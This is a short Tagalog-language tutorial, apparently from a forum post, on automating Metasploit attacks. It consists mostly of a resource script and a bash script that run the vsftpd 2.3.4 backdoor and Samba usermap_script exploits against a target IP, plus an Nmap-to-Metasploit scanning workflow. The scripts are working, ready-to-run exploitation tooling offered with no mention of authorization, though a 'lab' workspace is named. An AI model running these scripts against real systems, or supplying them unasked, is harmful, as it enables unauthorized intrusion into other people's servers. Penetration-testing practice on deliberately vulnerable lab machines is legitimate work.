PHNinjaWangya
Grasshopper
Ito ang pinaka-simple at built-in sa Metasploit.
Gumawa ng script file
nano auto_exploit.rc
Sample Script
spool output.txt
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.10
set RPORT 21
run
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.1.10
set RPORT 139
run
spool off
Run Script
msfconsole -r auto_exploit.rc
Automatic na tatakbo lahat ng exploits na nilagay mo.
Mas advanced—gagamit tayo ng Nmap + Metasploit database.
1. Scan target
nmap -sV -oX scan.xml 192.168.1.10
2. Open Metasploit
msfconsole
3. Import scan
db_import scan.xml
4. Auto-suggest exploits
db_nmap -sV 192.168.1.10
Then:
vulns
Example semi-auto flow:
msfconsole
workspace -a lab
db_nmap -sV 192.168.1.10
services
Search:
search vsftpd
Exploit:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.10
run
Pwede kang gumawa ng script na automatic:
Create script
nano auto.sh
Example:
#!/bin/bash
TARGET="192.168.1.10"
echo "[+] Scanning target..."
nmap -sV $TARGET -oX scan.xml
echo "[+] Running Metasploit auto exploit..."
msfconsole -q -x "
use exploit/unix/ftp/vsftpd_234_backdoor;
set RHOSTS $TARGET;
run;
exit
"
Run:
chmod +x auto.sh
./auto.sh
Dati may:
db_autopwn
Pero deprecated na (tinanggal dahil risky at noisy)
Instead of blind auto:
- nmap scan
- Identify service
- search sa Metasploit
- Run targeted exploit
Mas effective kaysa auto spam
- Walang perfect “auto häçk tool”
- Kailangan pa rin ng analysis
- Automation = speed, hindi magic